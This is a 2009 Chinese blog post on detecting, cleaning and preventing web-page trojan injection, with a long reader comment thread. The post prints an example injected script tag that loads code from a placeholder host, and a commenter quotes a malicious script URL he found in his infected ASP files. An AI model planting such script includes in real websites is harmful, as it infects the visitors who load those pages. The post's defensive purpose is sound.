如何预防和检测网页挂马？-卢松松博客

« 如何从零开始学习DIV+CSS 浅谈四大门户网站的评论网页设计 » 7月13日 时间：2009-7-13 13:3:40 如何预防和检测网页挂马？ 分类: 网络推广 | 浏览: | 评论: 171

在网站优化设计当中，检测网页木马也是很重要的一项工作，目前流行的网站被黑，是在相应的asp,htm,js等文件中，插入以js调用方式的。本文主要介绍网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

1:网页挂马的种类.

目前流行的网站被黑，是在相应的asp,htm,js等文件中，插入以js调用方式的。更详细的资料，请点击查看挂马代码大全。
卢松松以前做过的‘极品源码下载站’就遇到过JS挂马
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
‘校园闹翻天论坛’就遇到用户提权，利用动网程序漏洞（上传附件漏洞）拥有网站管理员权限。删了论坛几千条数据,一千多位会员的ID

2:如何检测网页是否被挂马。

(1)：专业检测工具，六款免费网页安全检测工具横向测评（华军软件园）点此进入

(2)：google检测，或者可以利用Google搜索你的网站、博客进行检测。如果有网站有木马则google会在搜索列表的下方提示该网站有不安全因素。

(3)：杀毒软件检测，常用的杀毒软件也可以检测出来。

(4)：人工检测，打开你的网站、博客，点击右键查看源文件，根据网页挂马的种类也可以查看是否中了木马。

(5)：使用McAfee SiteAdvisor安全浏览网页的插件。例:检测卢松松博客是否安全可点此查看。

卢松松:网页挂马的种类、如何检测网页是否被挂马、如何清除网页木马。如何防止网页被挂马。

3:如何清除网页木马。

一旦中了网页木马，就看那些文件是最近修改过的，主要查看这些新文件，（从FTP中可以查看文件最近修改时间。）然后进入源文件把相关的网页挂马种类的可疑代码删除。
如果你对你所使用的网站、博客程序不熟悉，建议删除所有文件（数据库、图片、文档、程序模板主题等文件夹可以保留）

4:如何防止网页被挂马。如果你的网站还没有被挂马，请从预防开始吧。

(1)：对网友开放上传附件功能的网站一定要进行身份认证，并只允许信任的人使用上传程序。

(2)：保证你所使用的程序及时的更新。

(3)：不要在前台网页上加注后台管理程序登陆页面的链接。

(4)：要时常备份数据库等重要文件，但不要把备份数据库放在程序默认的备份目录下。

(5)：管理员的用户名和密码要有一定复杂性，不能过于简单。

(6)：IIS中禁止写入和目录禁止执行的功能，二项功能组合，可以有效的防止ASP木马。

(7)：可以在服务器、虚拟主机控制面板，设置执行权限选项中，直接将有上传权限的目录，取消ASP的运行权限。

(8)：创建一个robots.txt上传到网站根目录。Robots能够有效的防范利用搜索引擎窃取信息的骇客。点此查看robots.txt使用方法。

除非注明，文章均为卢松松原创，欢迎转载！转载请注明本文地址，谢谢。

本文地址：http://lusongsong.com/reed/79.html

评论:(171)
隐藏评论
【评论很精彩，有内幕、有真相！】

171楼dajhk回复该留言
Post:2012-5-13 12:43:51
我的也有提升啊。。都不知道是怎么搞的www.ad10086.com www.yetaoao.net
www.fix114.net
170楼黄天运SEM博客回复该留言
Post:2012-5-2 13:01:29
嗯嗯哪个软件是不是有点麻烦啊呵呵
169楼seo优化回复该留言
Post:2012-2-26 18:40:11
说的不错，多谢分享了
168楼TOP排行回复该留言
Post:2012-2-4 23:52:51
我的就被挂马了.好郁闷啊.解决不了~
167楼豆诺博客回复该留言
Post:2011-11-29 11:08:28
我用的ZBLOG程序，不知道有没有问题。
166楼排名排行回复该留言
Post:2011-10-20 13:31:24
按照卢大大的方法检查了暂时没有发现挂马是不是php比asp安全不容易挂马？
165楼站长SEO工具箱回复该留言
Post:2011-7-16 7:29:10
呵呵，不错啊，欢迎回访啊
164楼团购网站大全回复该留言
Post:2011-7-8 15:29:30
这个很有用，新手站长很容易被挂马
163楼seo实习生回复该留言
Post:2011-7-4 10:37:37
很好！前段时间有人说我的网站有木马，用你说的方法在google 查了一下，没什么异常，只是我的所有收录股过的文章都不见了！
162楼Pavel回复该留言
Post:2011-5-31 14:17:04
我感觉现在用的wordpress安全性已经很高了吧，我查看是否挂马的方法只有查看源代码
161楼烟台SEO回复该留言
Post:2011-5-11 19:47:55
好好学习，预防挂马
160楼陕西同乡网回复该留言
Post:2011-4-29 22:40:08
终于有次沙发了
159楼八卦库baguaku.com回复该留言
Post:2011-4-14 16:22:19
第一次来。支持一下老师。。
158楼性感美女回复该留言
Post:2011-4-10 17:45:03
其中介绍的几个网站很不错
157楼myan回复该留言
Post:2011-3-24 13:37:10
看了“网站在线安全检测介绍”一文，还在想该怎么预防被挂马呢。在原文中的链接找到了这儿。大致对比了上述的8项，好像没什么大问题吧。希望不会被那些人光顾。
156楼宜昌房产网回复该留言
Post:2011-3-19 16:32:19
不错啊。。。。。。。。。。。。。
155楼最新电影回复该留言
Post:2011-1-10 19:07:06
我的站自己检查了一下，没检查出存在注入..
154楼SOHO一族回复该留言
Post:2010-12-2 22:22:30
好像看到有病毒扫描插件？我说的是wordpress程序的
153楼爱新奇回复该留言
Post:2010-11-24 10:37:32
很多挂马是通过编辑器的上传漏洞的
152楼博客之家回复该留言
Post:2010-11-15 20:30:06
这是个人博主都在恐惧的一件事
151楼淘客吧回复该留言
Post:2010-11-9 17:49:53
这文对偶太有用啦，谢谢分享哦
卢松松于 2010-12-3 13:25:15 回复
以后常来哈，只有你的支持我才更有动力。
150楼什么面膜美白效果好回复该留言
Post:2010-10-26 13:34:20
很好，很强大！卢老师，呵呵，受教了！
149楼烟台SEO回复该留言
Post:2010-10-14 21:42:39
分享的都是干货，值得收藏
148楼肖俊回复该留言
Post:2010-10-3 12:30:21
嗯，我的博客就把首页上的后台管理登陆页面的链接去掉了。每次登陆后台都是直接输入后台登陆网址。
147楼jianfei.5uge.cn回复该留言
Post:2010-9-3 22:42:21
一个文章能看很长时间
146楼jianfei.5uge.cn回复该留言
Post:2010-9-3 22:39:39
这个文章对我很有用
145楼乐泰胶水回复该留言
Post:2010-8-1 13:36:46
学习了，网站的安全问题是各位站长头痛的问题啊
144楼学夫子回复该留言
Post:2010-7-28 11:04:24
前不久我网站的主机商推出一个服务，就是锁定文件，锁定以后就不允许FTP访问。自己想修改的话也就只有解锁，这个功能实在是非常有用
143楼fdc回复该留言
Post:2010-5-5 17:51:51
可以用365uptime.com 在线监控的，网站一旦被挂马了，马上会发手机短信，emial 报警通知你的
142楼博客赚钱回复该留言
Post:2010-2-26 12:24:24
昨天还看到一个帖子说css挂马
使用的body 背景图 t 来挂的。。。
卢松松于 2010-3-18 20:47:41 回复
这方法够绝的
141楼NBA世界回复该留言
Post:2009-11-26 14:33:30
呃，想不到第一个搜到的就是你的博客，哈，恭喜了
卢松松于 2009-11-26 16:32:32 回复
搜的什么关键字啊？网页挂马吗？
短歌行于 2010-2-10 13:13:16 回复
放狗找“网站挂马”，你排在第1名。
140楼网页设计博客回复该留言
Post:2009-11-2 17:22:40
呵，还是老卢写得详细全面，学习学习了```
139楼青菜回复该留言
Post:2009-10-17 9:01:48
博主对这方面挺有研究的嘛!关键还是要做好网站的备份
卢松松于 2009-10-18 15:42:42 回复
对，网站备份很重要的
138楼三七八蛋回复该留言
Post:2009-9-21 9:23:04
主要还是防止程序漏洞，防注入。
其他，比如空间那边的问题，就要看你的RP了。。。
上次我的空间那边，ARP攻击被搞了三次，，，
卢松松于 2009-9-21 20:50:46 回复
你那个空间商都倒霉的哦
137楼一个人回复该留言
Post:2009-9-21 8:08:16
这些木马真的太讨厌了，我们的网页天天被挂马，每天上班第一件事就是用数据库恢复，烦死了，不知这个方法管不管用？
136楼微知博客回复该留言
Post:2009-9-17 16:57:49
恩，我想我还没有到需要被挂马的高度
135楼ifu25回复该留言
Post:2009-9-13 10:06:29
嗯，学习了。
134楼铠甲勇士全集回复该留言
Post:2009-8-19 13:53:34
厄，这个是好东西
133楼reizhi回复该留言
Post:2009-8-10 15:56:15
期待第一个挂马的……
132楼痕迹回复该留言
Post:2009-8-10 14:14:21
找挂马代码是最辛苦的了,不过用ZB程序的查找挂马代码应该容易些吧!!!检测木马,我的空间提供商那有24小时检测的东西.
131楼zhouwin回复该留言
Post:2009-8-5 22:33:48
我的站经常性的有人挂马，可是我就是成功不了．
130楼Eagle回复该留言
Post:2009-8-4 9:28:53
长知识了robots.txt这个文件一般是用来对seo的，没想到它的用途不止这些啊~
129楼兴诚回复该留言
Post:2009-8-3 10:54:46
真晕.昨天还好好的,今天就,,

哎...被人挂了木马,,

速求助.....

qq:332778993
湖南兴诚养殖场

http://www.hnxingcheng.com
卢松松于 2009-8-3 11:31:43 回复
看了你的网站都打不开
兴诚于 2009-8-3 11:52:20 回复
我现在正清空自己的空间,,

哎..没办法,正想办法恢复前几天的备份的,

不拓有什么办法可能以后出现同样的事

我下载到本地看了会里面好多*.asp文件中都有
http://asdonn.homelinux.org/asd.js?s=201&col=ffdd00
128楼七叶草回复该留言
Post:2009-8-2 23:58:46
唉，一次都没有被挂过！如果说被人挂马就代表网站做的成功了，那我还真想被挂一下。。。
127楼浅笑无声回复该留言
Post:2009-8-2 6:35:18
现在挂的马很厉害。
126楼京东商城回复该留言
Post:2009-7-30 15:57:40
人气真旺，不错的地方，以后常来

连锁酒店
125楼rav4回复该留言
Post:2009-7-30 15:54:07
借贵地引蜘蛛
丰田RAV4
124楼Davy回复该留言
Post:2009-7-28 8:27:37
是不是PHP比较安全一些？ASP的感觉很容易就挂了马子了。
123楼Noratis回复该留言
Post:2009-7-26 10:15:39
挂与被挂，this is a question!
122楼imwxm回复该留言
Post:2009-7-24 23:36:13
楼真高我恐高
121楼思亭回复该留言
Post:2009-7-23 12:55:32
能被检测出来的，都是新手所为，高手挂上去的马，呵呵，大家就慢慢地给它喂养成人吧：）~
120楼丁香回复该留言
Post:2009-7-22 1:00:00
很实用的工具
119楼idea1983回复该留言
Post:2009-7-20 16:05:23
查也查了杀也杀了，可是过几天又出现了！没办法了，就这么着吧！
118楼idea1983回复该留言
Post:2009-7-19 19:03:29
我根本就没装酷狗播放器，现在好像次数少了，不过有时还是会弹出来！
卢松松于 2009-7-20 15:45:23 回复
那可能确实中了什么木马，查杀一下吧！
117楼QQ网名回复该留言
Post:2009-7-19 10:16:33
蛮强的...这么多人评论啊..
116楼Bronco回复该留言
Post:2009-7-18 19:34:49
FF是跟Google联动的，如果Google检测到某网站含有恶意内容，在使用FF浏览的时候会得到提示。当然，如果不放心的话，除了杀毒软件，也可以装个McAfee的SiteAdvisor，这样在浏览的时候也会实时进行提示。
卢松松于 2009-7-19 15:05:02 回复
不仅仅是火狐浏览器吧，无论什么内核的浏览器，用google搜索都会有提示的！
Bronco 于 2009-7-19 16:52:49 回复
我的意思是在浏览网页的时候，比如你输入一个网址打开，如果这个网站在黑名单里，FF会给你提醒，建议你不要打开。
ps一句，为什么我不能回复管理员的留言呢？
卢松松于 2009-7-20 15:44:34 回复
你这不是已经回复我的留言了吗？呵呵！
FF的功能确实不错，我已经把FF设置为我的默认浏览器了！
115楼Kaysnoopy回复该留言
Post:2009-7-18 15:34:55
呵呵。头2年网页挂马可是太疯狂了。。断断续续的。。到现在也还好。
卢松松于 2009-7-19 15:06:18 回复
现在大家的防范意识都加强了，而且对我这些普通电脑，都没有诱惑了
114楼虾回复该留言
Post:2009-7-17 15:46:25
看完这篇文章。从头到尾。。。忽然想起了两种东西。一种是“暗战”。虽然暗战这部片子没有看过多少。不过敌我之间相互渗透的精神却理解的很精准。木马也是这样。我中有你。你中有我。。。。还有一种就是“无间道”。。。。。

马克思说过：世界上万事万物都是有联系的。从木马的角度来说，除木马病毒以外，其他任何东西都是木马病毒。不知道谁能理解虾说的这句话。
卢松松于 2009-7-20 15:37:38 回复
有一种不是木马的木马侵蚀的广大网民，只是我们没有把他列为木马行列而已！
卢松松于 2009-8-5 11:49:50 回复
本评论以收录到“感谢有你，博客七月精彩评论！”中。
113楼Joya回复该留言
Post:2009-7-17 14:43:06
马上转回去检查一下。。。
112楼月下买醉回复该留言
Post:2009-7-16 23:28:28
路过……
只帮别人做站，自己不弄……
帮人做好了也不负责维护……
(*^__^*)...嘻嘻
111楼kramon回复该留言
Post:2009-7-16 18:29:03
也不知道黑客们喜欢在什么样的站上挂马...
110楼loofe回复该留言
Post:2009-7-16 14:16:28
上联：这里的楼房高又高
下联：那里的评论多又多
横批：博客中的沙发
不要见笑呵！呵！
卢松松于 2009-7-20 15:30:54 回复
我坚信，你这条评论必定入选下期博客精彩评论。
卢松松于 2009-8-5 11:48:36 回复
本评论以收录到“感谢有你，博客七月精彩评论！”中。
109楼life回复该留言
Post:2009-7-16 10:30:33
网站被挂马，很麻烦的一件事情。
108楼johnny回复该留言
Post:2009-7-16 8:53:16
过来逛逛
107楼零距离博客回复该留言
Post:2009-7-16 0:52:27
想创建一个robots.txt，正好学习下！
106楼leecay回复该留言
Post:2009-7-16 0:31:13
这个不错，实用性强~
105楼newcoin回复该留言
Post:2009-7-15 23:24:05
那个macfee
的其实不错，不过好像有点影响网速
个人小博客没人会挂马吧？
卢松松于 2009-7-20 15:28:17 回复
当你的博客快成功的时候就会被挂马！
104楼夹子回复该留言
Post:2009-7-15 23:10:18
我是104楼。。。- -！

挂马呀。。。。
103楼chanthon回复该留言
Post:2009-7-15 18:06:25
呵呵。还没遇到过网页挂马的事情。
卢松松于 2009-7-20 15:26:57 回复
过一年半载的就会出现了，嘿嘿，那也是你成功的开始！
102楼古墓候梅回复该留言
Post:2009-7-15 17:32:29
挂马后，我一般是备份博客模板，当检测到博客被挂马时，就把备份模板覆盖回去就可以了。
卢松松于 2009-7-20 15:26:13 回复
数据库也需要多多备案啊尤其是用虚拟空间的！
101楼射击博客回复该留言
Post:2009-7-15 15:50:16
自我检查一下邮箱打错了
100楼射击博客回复该留言
Post:2009-7-15 15:49:40
自我检查一下
99楼秋天一棵树回复该留言
Post:2009-7-15 11:06:30
建议的第七条非常好。
98楼托尔银月回复该留言
Post:2009-7-15 10:37:11
挂马盛行，X星表示“用我X星者得永生~~~”
趁火打劫的意思~~~~
卢松松于 2009-7-20 15:24:43 回复
用我X星者得永生~~~
这句话很熟悉啊。是什么呢？
97楼戴尔博客回复该留言
Post:2009-7-15 9:59:38
有的是空间服务器被挂马，自己是没办法清除的
96楼浅笑无声回复该留言
Post:2009-7-15 8:59:03
卢松松，看来你得设计个网易效果了。盖楼啊。
卢松松于 2009-7-20 15:23:12 回复
楼盖不起来，而且盖楼显得版面会很乱，所以没有这个打算！
95楼免费小说回复该留言
Post:2009-7-14 23:32:16
松松,我跟你说,不是我吓唬你啊….你…..你被点名了,虽然我觉得:游戏是好游戏,这题目有点太无聊…但为了能继续，我还是完成了题目,并勇敢地点了你的名..哈~
卢松松于 2009-7-20 15:20:57 回复
嘿嘿，我准备把点名游戏的回答放在另外一个博客中！
94楼敏锐的眼睛回复该留言
Post:2009-7-14 22:54:53
被挂是郁闷的……
93楼YellowOne回复该留言
Post:2009-7-14 22:53:17
要学习下，以前就被人挂过
92楼seer.zou回复该留言
Post:2009-7-14 22:41:29
归纳的还不错
91楼hahn回复该留言
Post:2009-7-14 22:38:00
哇，你的博客不错啊，从你在我的博客上的评论上得知此处。
两个月前我的博客PR也有4呢，但这几个月太忙没更新，变为零了。
挺喜欢这个博客：）
妖狐闪现于 2009-7-14 22:47:40 回复
晕，从4变成0？太恐怖了！
博译论于 2009-7-15 0:20:23 回复
我是经历了131
博译论于 2009-7-15 0:26:16 回复
去实践一下，先从半荒芜的网站下手挂马，再自行解马
世纪之光于 2009-7-15 9:12:33 回复
有波动才好啊，像我的两年一直是2，真他娘的郁闷。
hahn 于 2009-7-16 11:10:24 回复
这个4到0是我经历的第二次了，因为忙的原因，前一次也是数月未更新，流量大减，后来就变0了。之后更新恢复了，也总去其他博客那里留言访问，不久也就恢复原来的PR值了。
卢松松于 2009-7-20 15:08:53 回复
以前我对独立博客一直不重视，所以对PR没有什么概念。直到今年年初才买了个独立域名做博客。
90楼三脚猫回复该留言
Post:2009-7-14 22:01:16
有点怕了。。。不知道偶的博客有没有成为“马坊”
89楼蛋王回复该留言
Post:2009-7-14 21:47:12
这个不错，转给给公司技术看看。。
88楼各种虾米回复该留言
Post:2009-7-14 21:40:38
你的人气真好！！！！
87楼西小西回复该留言
Post:2009-7-14 21:16:56
西小西被挂三次咯~~
卢松松于 2009-7-20 15:04:02 回复
难道你成功了三次？
86楼YOJA回复该留言
Post:2009-7-14 20:20:06
人气啊！几天，就1400
85楼大帝007回复该留言
Post:2009-7-14 19:58:04
一个很不错的毛网前两天被挂了木马，哎~~~
卢松松于 2009-7-20 15:03:11 回复
下次搜索黄色网站用google搜索，不仅没病毒，而且供你选择的网站也多！
84楼Fengshen回复该留言
Post:2009-7-14 19:36:41
图片挺猛，一匹马。哈哈
卢松松于 2009-7-20 15:00:44 回复
是黑马，据另外一位网友说，这匹还还带着诡异的笑容！
83楼西风回复该留言
Post:2009-7-14 19:27:36
我这里很棒没病毒
不过我所去过的黄色网站全部挂马
卢松松于 2009-7-20 14:58:48 回复
下次搜索黄色网站用google搜索，不仅没病毒，而且供你选择的网站也多！
82楼yibing回复该留言
Post:2009-7-14 17:11:25
写得很详细,很有水平哦,感觉博主不但人缘好,而且技术也超强呀.
卢松松于 2009-7-20 14:57:43 回复
做技术的不能整天埋头写代码，多多交流才是真的！
81楼太阳博客回复该留言
Post:2009-7-14 16:30:50
好博客啊！这么多评论，好生羡慕。本老太自愧不如啊！
卢松松于 2009-7-20 14:54:00 回复
勤奋、专一、坚持能做到的话，你也一样！
80楼随影回复该留言
Post:2009-7-14 16:09:07
所谓道高一尺魔高一丈！！！让攻击来的更猛烈些吧哈哈开玩笑哈！
卢松松于 2009-7-20 14:51:24 回复
当你的网站被挂马的时候说明你的网站离成功不远了！
79楼燕子回复该留言
Post:2009-7-14 16:08:24
想要進入你的博客的留言欄還真得耐著性子慢慢滴往下拉滾動條阿。。。
我也說呢，怎麼會被掛馬呢？保管好密碼什麼的也不至於阿。。。
“現在的社會風氣實在太坏了”，不得不防阿
卢松松于 2009-7-20 14:49:40 回复
这样，每篇文章信息栏里有一个“我来说两句”点击这个可以快捷到评论窗口！
78楼whitmine回复该留言
Post:2009-7-14 15:53:29
这名好熟啊，好像嘀咕上见过
卢松松于 2009-7-20 14:47:29 回复
我在嘀咕上也有号，用过嘀咕一段时间
77楼CG回复该留言
Post:2009-7-14 15:03:52
呵呵，用JS挂马已经很落后了，利用windows的GDI漏洞的图像挂马和ActiveX漏洞的挂马才是要命的哦
卢松松于 2009-7-20 14:45:04 回复
图像挂马和ActiveX漏洞，怎么使用呢？
76楼Yo2回复该留言
Post:2009-7-14 15:03:52
这个应该学学~
75楼52tool回复该留言
Post:2009-7-14 14:37:23
我是来检查你今天被挂马了没
卢松松于 2009-7-20 14:43:56 回复
检查出来没有嘛！
52tool 于 2009-7-20 14:58:41 回复
检查出来了，“如果觉得我的博客还不错”就是，因为老让我们不自觉地“猛击”此处。
74楼怀仁大岗回复该留言
Post:2009-7-14 14:30:08
说马吧，还是电信的马厉害，每次开网站的时候都会弹电信的广告．其次就是大小姐了，马做的也不错．一般咱这小博客，没有几个人会在意．松松的网站连广告吼没加．挂了也没用．
卢松松于 2009-7-20 14:41:02 回复
宽带运营商的马确实很厉害，仿不住，你观察的还挺仔细的嘛！目前还没有做广告的想法
73楼JetKing回复该留言
Post:2009-7-14 13:38:15
最BT的挂马还是电信、网通之类的运营商，每天至少要遇到十来次运营商的强奸式广告，，那个才叫猛啊。。。哎。。
卢松松于 2009-7-19 16:57:05 回复
是呢，这种挂马方式我们都无法预防的哎！
72楼pan回复该留言
Post:2009-7-14 12:27:53
学习，怕怕
71楼zwwooooo回复该留言
Post:2009-7-14 12:18:31
我总是在地下层留言：小站一般不怎么会给挂马
卢松松于 2009-7-20 14:35:20 回复
当你的网站被挂马的时候，说明你成功了！
70楼superwill回复该留言
Post:2009-7-14 11:48:12
呵呵，删除了登陆链接，只要在网址输入地方键入登陆地址就可以了。是不是登陆网址可以自己起一个只有自己知道的地址啊？
卢松松于 2009-7-19 16:52:22 回复
是可以的，有些程序是支持更改后台目录文件的！
69楼Aappy.com回复该留言
Post:2009-7-14 11:46:55
好厉害！
68楼superwill回复该留言
Post:2009-7-14 11:44:41
(3)：不要在前台网页上加注后台管理程序登陆页面的链接。

呵呵，这个很有用，我去把我的删掉。
小鬼于 2009-7-14 23:58:38 回复
话说没什么用、、、除非你能把后台地址改了，否则别人一样知道你的后台地址
67楼SMILE回复该留言
Post:2009-7-14 11:15:10
不错,支持下~刚GG了一下,没有提示安全问题,嘿...
66楼ptubuntu回复该留言
Post:2009-7-14 11:09:34
要是都没有木马.我们这次人都要下岗了.
卢松松于 2009-7-19 16:49:44 回复
哥们你的职业很不错啊！
65楼ptubuntu回复该留言
Post:2009-7-14 11:09:05
使用php的安全性还是比较高的.不怕.
64楼北山回复该留言
Post:2009-7-14 11:07:29
其中介绍的几个网站很不错
63楼越夜回复该留言
Post:2009-7-14 11:04:02
McAfee SiteAdvisor 有点意思,正在研究...
越夜于 2009-7-15 15:03:52 回复
偷懒,昨天怎么可能没有更新...
卢松松于 2009-7-19 16:48:44 回复
更新了，回来看看我吧！
62楼FORECE回复该留言
Post:2009-7-14 10:20:39
唉，好久没挂马了，你这图片还真雷人，那马嘴还微笑呢，我真无语。。。
卢松松于 2009-7-19 16:41:45 回复
我原本以为这匹马很帅气！
61楼世纪之光回复该留言
Post:2009-7-14 10:11:06
我一般都是通过网页源文件去判断，个人觉得PHP相对安全，以前ASP经常被挂马，都把我弄成反网页木马的高手了。
不过看源文件发现被挂马，不一定是服务器端的原因，像ARP之内在客户端的攻击，同样可以导致客户端浏览器强制挂马，我就遇到过。
卢松松于 2009-7-19 16:38:41 回复
ARP之内在客户端的攻击。是如何攻击的呢？
60楼micogle回复该留言
Post:2009-7-14 9:16:48
预防为主~~~
59楼左岸读书回复该留言
Post:2009-7-14 9:04:25
被挂木马就像在人的后面按上了尾巴——还是那种随便乱甩的尾巴~
58楼园子回复该留言
Post:2009-7-14 9:01:44
最后的八个建议很不错

每一个都值得认真去做~
57楼0cai回复该留言
Post:2009-7-14 8:52:35
恩很不错啊及时前不久我一个网站就被挂了JS木马，到现在还不知道哪里有漏洞！
56楼追忆永恒回复该留言
Post:2009-7-14 7:40:18
呵呵，像我的小博客没人会那么无聊去挂马，到是松松的博客要小心一下!
卢松松于 2009-7-19 16:34:24 回复
当你的站被别人挂马的时候，说明你成功了~
55楼wxhao回复该留言
Post:2009-7-14 6:40:56
楼主你的网页真好看
收藏了
54楼37计回复该留言
Post:2009-7-14 2:48:47
我有一个站，被挂了半年，怎么都解决不了，也没心思去弄，

后来终于想到一个好办法，把关给站了。他就不存在了。呵呵。
dcp 于 2009-7-14 23:27:05 回复
真JB逗。 “把关给站了"``
你把说给话倒了！
53楼佘星星回复该留言
Post:2009-7-14 1:01:59
最让人头痛的还是服务器被挂马，或者被劫持。
左岸读书于 2009-7-14 9:05:53 回复
这个有同感~
52楼daniel回复该留言
Post:2009-7-13 23:59:17
真是需要小心防范
51楼Showfom回复该留言
Post:2009-7-13 23:47:31
所以说最好认识几个黑客界的朋友，挂马了立马给对方挂回去……
50楼junjun回复该留言
Post:2009-7-13 23:29:01
貌似我就只用过google检测
卢松松于 2009-7-20 14:56:51 回复
googl检测有一个弊端，如果不收录或者被拔毛的网站是无法检测的
49楼laofan回复该留言
Post:2009-7-13 23:18:17
学习了，不过我觉得我的站应该不会被挂马吧，因为我的站没价值啊
48楼XDash回复该留言
Post:2009-7-13 23:05:31
几个链接不错，收了~
47楼season回复该留言
Post:2009-7-13 23:02:32
又长见识了
46楼365hope回复该留言
Post:2009-7-13 22:42:02
这么一说，我还真的怀疑俺们的站点 “中奖” 了，因为有时候页面总是不能够完整显示，在页面左下方显示“页面错误”等字样。不知道这是不是症状？

看来，需要按照老大的方法，解决这个问题啦！呵呵~~
卢松松于 2009-7-20 14:55:32 回复
不是被黑，一般你改过原模板主题的时候，JS，或者语法错误，IE就会提示的。我做网页的时候经常会出现这样的情况。
45楼海天无影回复该留言
Post:2009-7-13 22:21:55
挂马的方式很多种的不好防范的俗话说道高一尺魔高一丈……
44楼仁心博客回复该留言
Post:2009-7-13 21:59:18
安全还是重要的
43楼bolo回复该留言
Post:2009-7-13 21:57:17
最重要是不泄露帐号和设置好目录权限
42楼yoja回复该留言
Post:2009-7-13 21:56:38
写的好专业，去查查。防患未然
41楼疯秀回复该留言
Post:2009-7-13 21:53:34
我的破站人家都不稀罕挂
卢松松于 2009-7-19 15:50:06 回复
FPD200-59917-97447-41275
40楼歪歪屋啊回复该留言
Post:2009-7-13 20:42:46
呵呵,确实,不过好像讲的都是ASP吧,PHP呢?
39楼SpookZanG回复该留言
Post:2009-7-13 20:42:19
Google可不喜欢被挂马的网站....他会在搜索中提升此网站有马
38楼浩子回复该留言
Post:2009-7-13 20:32:08
万幸。我的也上好好的
呵呵
希望这种馅饼还是不要来
卢松松于 2009-7-19 15:48:38 回复
当你的站被别人挂马的时候，说明你成功了~
37楼飞晏回复该留言
Post:2009-7-13 20:29:54
今天服务器被挂马了就为了卖几个链接我都不忍心称这样的人是黑客
放链接就放链接把还把我网页搞成乱码！！！！
卢松松于 2009-7-19 15:40:48 回复
此“黑客”不会布局页面，建议他学习一下如何从零学起DIV+CSS
36楼奋飞回复该留言
Post:2009-7-13 20:22:23
呵呵，这些方法不错啊，
35楼Qing回复该留言
Post:2009-7-13 20:21:04
我还没挂过马
卢松松于 2009-7-19 15:38:52 回复
当你的站被别人挂马的时候，说明你成功了~
34楼蓝冰回复该留言
Post:2009-7-13 20:04:22
挂马么？
谁在我破博客挂马有啥用
卢松松于 2009-7-19 15:37:44 回复
当你的站被别人挂马的时候，说明你成功了~
33楼先看看回复该留言
Post:2009-7-13 19:53:29
越来越发现你是一个牛人了，佩服。
卢松松于 2009-7-19 15:35:53 回复
只要肯学，这些基础挂马知识谁都能学会的！
32楼扬回复该留言
Post:2009-7-13 19:48:09
不错。估计我是用不着了。
31楼Sean回复该留言
Post:2009-7-13 19:37:54
收藏一下，最近发现博客有点怪怪的，要好好检查一下了
30楼未命名文档回复该留言
Post:2009-7-13 19:29:49
我还以为我很快呢……
又20多楼了！
yoja 于 2009-7-13 21:57:31 回复
の，是30楼
29楼huaimao回复该留言
Post:2009-7-13 19:26:13
我的天啊！下次发文章前一定要先通知下我，要不然偶末沙发了！
28楼平平回复该留言
Post:2009-7-13 19:25:22
当我的站被别人挂马的时候，说明我成功了~
卢松松于 2009-7-19 15:31:59 回复
说的对。挂马之日，就是成功的开始！
27楼A.shun回复该留言
Post:2009-7-13 19:01:21
这个问题上bsp的好处就出来了
不过学着怎么防范和检测总是有用的
26楼内大臣回复该留言
Post:2009-7-13 18:48:14
此物有用,收藏
25楼笔头回复该留言
Post:2009-7-13 17:56:50
太多了，简直是防不胜防。我先去看看我家后门关了没~
24楼吖Bee回复该留言
Post:2009-7-13 17:54:05
好想以前用Z-Blog的时候试过.....但很快被解决了
23楼Jutoy回复该留言
Post:2009-7-13 17:39:36
应该没有黑客对我的小站有兴趣，哈哈~
卢松松于 2009-7-19 15:27:46 回复
你做的有点规模，有利用价值的时候就是挂马的时候嘿嘿
22楼细毛回复该留言
Post:2009-7-13 17:26:22
挂马是在太麻烦了，费时又费力的……
卢松松于 2009-7-19 15:26:17 回复
会者不难嘛。很多人都好这一口呢！
21楼idea1983回复该留言
Post:2009-7-13 17:07:29
我感觉我的网页被挂马上，打开博客老是顶部跳出一个大广告！偶尔右下角会出现！
卢松松于 2009-7-19 15:25:40 回复
按照文章中的方法试试，如果还是出现弹窗，试试把酷狗播放器关掉
20楼妖狐闪现回复该留言
Post:2009-7-13 16:41:19
这篇文章，我直接保存到本地了。
太牛了，查查去。
妖狐闪现于 2009-7-13 19:39:09 回复
我决定以后在卢松松这里不再抢沙发板凳，改抢整数！抢666，抢888！
小鬼于 2009-7-13 19:58:07 回复
。。。我对你。。。。
Lxhome 于 2009-7-14 12:43:22 回复
下次不敢了
卢松松于 2009-7-19 15:22:14 回复
大哥，您太抬举人了吧！
卢松松于 2009-8-5 11:49:02 回复
本评论以收录到“感谢有你，博客七月精彩评论！”中。
19楼阿东回复该留言
Post:2009-7-13 16:38:12
这个一定来学习。。
先顶起看。。
18楼我想想回复该留言
Post:2009-7-13 16:21:21
有的是假像，局域网受arp攻击时。360会提示网站挂马的信息。
卢松松于 2009-7-19 15:21:27 回复
所以就出了局域网防护工具！
17楼中药饮片回复该留言
Post:2009-7-13 15:50:24
我一般是搜索替换来查找挂马
16楼RayStorm回复该留言
Post:2009-7-13 15:38:32
分析得很到位
15楼youKnowMe回复该留言
Post:2009-7-13 15:13:15
网址不能使https啊
14楼快乐臭虫回复该留言
Post:2009-7-13 15:10:22
曾经因为服务器的问题被挂个马，当时还算容易的就删除了，是啊，要特注意以防被挂马！
卢松松于 2009-7-19 15:19:35 回复
和你一样，我的网站也遇到了，不过很容易就删除了！
13楼志言回复该留言
Post:2009-7-13 15:07:53
还没碰到过，小站也会有人无聊去挂马？
12楼亦歌回复该留言
Post:2009-7-13 15:04:25
这个问题值得深入学习一下，我也遇到过。
11楼回忆回复该留言
Post:2009-7-13 15:03:37
呵呵，学习了
10楼万戈回复该留言
Post:2009-7-13 14:47:55
真不错，我还不知问谁好呢，你这儿就给答案了
卢松松于 2009-7-19 15:18:20 回复
很幸运，我中奖了，多谢关照！
9楼simaopig回复该留言
Post:2009-7-13 14:46:20
学会这个，可以去给别人挂马了。嗯。
8楼simaopig回复该留言
Post:2009-7-13 14:45:58
学会这个，可以去给别人挂巴了。嗯。
卢松松于 2009-7-19 15:17:50 回复
嗯，小子，你给了我一个启示，下次我打算用实战写一篇如果挂马的文章。
7楼KILLFOX回复该留言
Post:2009-7-13 14:42:11
嘉程在上面抢了两个，太不像话了，要严厉打击，话说现在被挂黑链的比较多。
小明猪于 2009-7-13 17:15:56 回复
